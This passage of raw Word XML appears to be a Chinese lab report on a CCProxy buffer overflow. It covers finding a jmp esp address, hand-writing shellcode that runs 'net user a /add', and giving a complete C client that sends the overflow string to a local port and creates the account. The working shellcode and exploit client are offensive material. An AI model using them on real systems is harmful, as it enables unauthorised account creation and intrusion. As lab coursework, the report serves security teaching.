          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5749290" cy="1957705"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="5" name="图片 5" descr="_(9U583@E50CEXE@5Q%IK@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_(9U583@E50CEXE@5Q%IK@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ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0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4.右键查找jmp esp指令，发现不存在，因此尝试在程序调用的其他模块中查找。在右键“查看”进入模块“Kernel32”中命令查找发现了jmp esp，地址为0x777B3132</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5754370" cy="1306195"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>
            <wp:docPr id="6" name="图片 6" descr="03896%1T~WM2}GM0UG$}6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03896%1T~WM2}GM0UG$}6CU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ind w:left="420" w:leftChars="0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5.将堆栈段0x03CF66C4填充为jmp esp的地址0x777B3132，以保证shellcode的正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="center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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5755005" cy="1075055"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1270"/>
            <wp:docPr id="7" name="图片 7" descr="}T1IJM(U7@B{C{6S9ET26$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}T1IJM(U7@B{C{6S9ET26$Q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ind w:left="420" w:leftChars="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6.重新运行，发现retn 0xc正常跳转至jmp esp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="center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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5751830" cy="2170430"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="8" name="图片 8" descr="8`PIRS}6555X{I[)Y`()UO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`PIRS}6555X{I[)Y`()UO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ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default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完成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>完成基本的添加用户Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="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1.在目标主机上创建一个用户，命令就是system(“net user 用户名/add”)，该函数存在windows的msvsrt.dll动态链接库中，于是写以下C语言代码在VC6中运行。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840" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts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#include 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"stdafx.h"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84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#include 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&lt;windows.h&gt;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84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#include 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&lt;winbase.h&gt;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84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main()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84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84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LoadLibrary(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"msvcrt.dll"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84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__asm {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84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push ebp ;保存ebp，esp－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4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84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mov ebp,esp ;给ebp赋新值，将作为局部变量的基指针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84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xor edi,edi ;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84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push edi ;压入0，esp－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,;作用是构造字符串的结尾\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字符 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84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sub esp,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0ch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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>10h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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>6eh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;n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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0fh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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>65h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;e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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0eh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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>74h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;t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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0dh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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>20h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;空格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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0ch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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>75h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;u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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0bh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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>73h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;s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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0ah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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>65h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;e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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>09h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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>72h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;r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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>08h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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>20h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;空格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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>07h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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>61h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;a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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>06h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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>20h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;空格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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>05h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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>2fh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;/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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>04h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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>61h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;a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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>03h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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>64h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;d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84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mov byte ptr [ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>02h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color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>64h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;d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84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lea eax,[ebp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="CD3131"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>10h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 ;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84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push eax ;串地址作为参数入栈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84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mov eax, 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0x77bf93c7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84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call eax ;调用system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84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}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84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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0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2.在OD中debug，使用diassembly进入反汇编界面，由于CCPROXY已经调用了msvsrt.dll库，所以只需要记录从0x0040103C到0x0040108B的十六进制即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6343015" cy="3141345"/>
            <wp:effectExtent l="0" t="0" r="635" b="1905"/>
            <wp:docPr id="9" name="图片 9" descr=")U_%C5KTJ]YL49Z[]ITLN$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)U_%C5KTJ]YL49Z[]ITLN$E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43015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 w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5746750" cy="2275840"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635"/>
            <wp:docPr id="10" name="图片 10" descr="@RI(P}~BAC8O}`O(_M7_DR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@RI(P}~BAC8O}`O(_M7_DR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 w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left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3.直接执行上述代码可以发现已经创建一个a的账户（之后进行删除a账户，以防影响后续实验）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4984750" cy="1486535"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:docPr id="11" name="图片 11" descr="T0XRDC)81B)E%%WHP5S@8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T0XRDC)81B)E%%WHP5S@8ZE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 w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="-420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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t>利用缓冲区溢出执行ShellCode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0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  <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>调试发现最终构建的ping命令字符串为：4个随意字符做填充使用，十六进制版本的shellcode，无用字符一直填充至第1012位，第1013位至第1016位为JMP ESP命令地址转换成的字符串，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>777b3132</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>地址转换为字符串为“21{w”，最终得到如下代码。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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pP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#include 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"stdafx.h"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&lt;winsock2.h&gt;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#pragma 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comment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lib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"Ws2_32.lib"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ind w:left="420" w:leftChars="0" w:firstLine="0" w:firstLineChars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#define MAX_LEN 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2000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shell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[]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=  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"\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x0C\xC6"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"\x45\xF0\x6E\xC6\x45\xF1\x65\xC6\x45\xF2"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"\x74\xC6\x45\xF3\x20\xC6\x45\xF4\x75\xC6"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"\x45\xF5\x73\xC6\x45\xF6\x65\xC6\x45\xF7"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"\x72\xC6\x45\xF8\x20\xC6\x45\xF9\x61\xC6"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"\x45\xFA\x20\xC6\x45\xFB\x2F\xC6\x45\xFC"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"\x61\xC6\x45\xFD\x64\xC6\x45\xFE\x64\x8D"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"\x45\xF0\x50\xB8\xC7\x93\xBF\x77\xFF\xD0"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main(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argc,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* argv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[]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WSADATA ws; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b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 初始化 ws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ret = WSAStartup(MAKEWORD(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), &amp;ws);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sockaddr_in sa;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sa.sin_family = AF_INET;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sa.sin_port = htons(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23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sa.sin_addr.s_addr = inet_addr(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"127.0.0.1"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buf[MAX_LEN];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buf1[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buf[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]=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'p'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;buf[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]=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'i'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;buf[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]=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'n'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;buf[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]=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'g'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;buf[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]=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 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 插入Shellcode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l = strlen(shell);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//前4个字节为无用字节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buf[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]=buf[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]=buf[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]=buf[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]=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'a'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//开始填入shellcode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i,j;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(i=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,j=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;i&lt;l+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;i++,j++){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    buf[i]=shell[j];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//到溢出点为止都填入无用字节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(i=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+l;i&lt;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1012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;i++)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    buf[i]=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'a'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//在溢出点处填入 jump esp 指令的地址                       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buf[i++]=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'2'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;buf[i++]=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'1'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;buf[i++]=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'{'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;buf[i++]=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'w'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//继续填充无用字节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(i=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1021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;i&lt;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1998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;i++)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buf[i]=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'a'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//命令结束加上\r\n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buf[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1998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]=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'\r'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;buf[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1999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]=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'\n'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 创建 socket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SOCKET sc = WSASocket(AF_INET, SOCK_STREAM,IPPROTO_TCP,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//连接到服务器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ret = connect(sc, (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sockaddr*)&amp;sa,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(sa));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//接收服务器端的回答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recv(sc,buf1,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 发送攻击数据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ret = send(sc, buf, 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2000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closesocket(sc);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WSACleanup();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jc w:val="left"/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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left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2.打开CCPROXY，然后直接运行编写好的攻击代码，在OD中进行查看，观察到，JMP ESP执行结束后将执行编写好的shellcode，最终成功创建用户a（在原来的a用户已经删除的基础上）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:line="143" w:lineRule="atLeast"/>
        <w:jc w:val="left"/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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5757545" cy="3312160"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="12" name="图片 12" descr="YBVWGU{]%LRBOHXN4%N~BD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YBVWGU{]%LRBOHXN4%N~BDV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Cs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5746115" cy="821055"/>
            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
            <wp:docPr id="13" name="图片 13" descr="PMB$@V44OSX9BQG[J5PO~Q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PMB$@V44OSX9BQG[J5PO~QU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 w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5756910" cy="896620"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8255"/>
            <wp:docPr id="14" name="图片 14" descr="T0XRDC)81B)E%%WHP5S@8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T0XRDC)81B)E%%WHP5S@8ZE"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect t="24371" b="2341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topLinePunct w:val="0"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
